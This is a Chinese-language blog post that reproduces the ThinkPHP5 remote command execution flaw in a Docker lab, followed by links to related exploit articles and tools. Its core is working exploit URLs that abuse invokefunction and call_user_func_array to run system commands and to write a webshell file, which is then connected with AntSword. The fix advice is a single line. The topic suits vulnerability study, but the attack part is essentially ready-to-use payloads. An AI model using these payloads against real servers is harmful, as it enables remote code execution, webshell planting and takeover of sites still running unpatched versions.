ThinkPHP5远程命令执行漏洞

最新推荐文章于 2024-09-08 19:35:49 发布
最新推荐文章于 2024-09-08 19:35:49 发布
阅读量2k 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45314073/article/details/126954299
版权

ThinPHP简介

ThinkPHP是一个快速、兼容而且简单的轻量级国产 PHP开发框架 ,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,使用面向对象的开发结构和 MVC模式 ,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式。

漏洞产生原因

由于thinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,攻击者构造指定的请求,可以直接getshell。

受影响版本

thinkPHP 5.0.x <thinkPHP 5.0.23

thinkPHP 5.1 <thinkPHP 5.1.31

漏洞复现

启动环境

docker-compose build
docker-compose up -d

访问web环境

 代码执行

/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

 

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd

 写入一句话

 

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码

蚁剑连接

修复建议:请升级至最新版本

 参考链接:ThinkPHP5 远程命令执行漏洞 - ʚɞ无恙 - 博客园

背着书包打太极
关注
专栏目录
thinkphp 一键漏洞检测
12-09
thinkphp 一键漏洞检测,V3.2.0~V5.1.23,都可进行测试
ThinkPHP5漏洞分析之代码执行
duoba_an的博客
08-14 959
本次漏洞存在于的缓存类中。该类会将缓存数据通过序列化的方式,直接存储在文件中,攻击者通过精心构造的,即可将写入缓存文件。缓存文件的名字和目录均可预测出来,一旦缓存目录可访问或结合任意文件包含漏洞,即可触发。漏洞影响版本:。
THINKPHP5.X远程命令执行漏洞
qq_40461312的博客
10-09 1634
前言 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,推荐尽快更新到最新版本。 一、漏洞影响范围 5.x < 5.1.31, <= 5.0.23 二、如何确认THINKPHP版本 多数情况下直接引发报错页面即可获取到thinkphp版本信息,也可以.
工具分享 | TPscan - 一键ThinkPHP漏洞检测getshell
最新发布
IT软件汇
09-08 521
TPscan是一款基于Python3的ThinkPHP漏洞检测工具。
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 9167
ThinkPHP5系列远程代码执行漏洞复现(详细)
ThinkPHP5 远程代码执行漏洞分析
repoman的博客
03-16 7928
前言 消息刚刚曝出来的时候还以为自己能半天把漏洞给找出来,果然是太菜太年轻了,23333 漏洞分析 漏洞点 此次漏洞出现在ThinkPHP用于处理HTTP请求的Request类中,其中的method方法用于获取当前的请求类型。 thinkphp/library/think/Request.php var_method为“表单伪装变量”,可在application/config.ph...
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
qq_67473072的博客
07-13 7089
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
### ThinkPHP 5.0 远程代码执行漏洞分析 #### 漏洞背景与概述 ThinkPHP是一款广泛使用的PHP框架,它提供了丰富的功能和良好的性能。然而,如同任何复杂的软件系统一样,它也存在安全漏洞。本次分析的焦点集中在...
thinkphp5远程执行代码漏洞修复补丁.zip
04-17
标题中的“thinkphp5远程执行代码漏洞修复补丁”指的是ThinkPHP5框架存在一个严重的安全问题,即远程代码执行漏洞(通常称为RCE)。在ThinkPHP5中,这个漏洞允许攻击者通过精心构造的HTTP请求,执行任意系统命令,...
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
tp5漏洞利用工具.zip
01-03
标题中的“tp5漏洞利用工具.zip”指的是一个包含利用ThinkPHP5框架中安全漏洞的工具包,这个压缩包主要用于测试和展示ThinkPHP5代码执行漏洞的利用方式。描述提到,这个工具包含了两种方法,用于在目标系统上检测并...
python3编写ThinkPHP命令执行Getshell的方法
09-19
本文将详细介绍如何利用 Python3 来实现 ThinkPHP 框架中的远程命令执行漏洞,并最终获取 WebShell。 #### 二、ThinkPHP 命令执行漏洞简介 ThinkPHP 中存在一种较为常见的远程命令执行漏洞,该漏洞主要发生在对...
thinkphp5漏洞验证
04-16
ThinkPHP5中,存在一个可能导致远程代码执行(RCE)的安全漏洞。这个漏洞主要源于框架的路由解析机制和参数过滤不严,使得恶意用户可能通过构造特定的URL请求,触发框架内部的敏感函数执行,从而获取服务器的敏感...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
ThinkPHP5.0.x远程执行漏洞分析与复现
qq_74148743的博客
05-11 1424
2018年12月10日,ThinkPHPv5系列发布安全更新,修复了一处可导致远程代码执行的严重漏洞。此次漏洞ThinkPHP v5框架代码问题引起,其覆盖面广,且可直接远程执行任何代码和命令。电子商务行业、金融服务行业、互联网游戏行业等网站使用该ThinkPHP框架比较多,需要格外关注。由于ThinkPHP v5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接进行远程的代码执行,进而获得服务器权限。
ctfshow 框架复现 web467-web475
cht6667的博客
02-23 522
通过使用工具通过,以后仔细研究原理,读者可以自己研究相关实现细节
Thinkphp5.0.23远程代码执行漏洞复现
02-01 1796
Thinkphp5.0.23远程代码执行漏洞介绍、成因和复现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值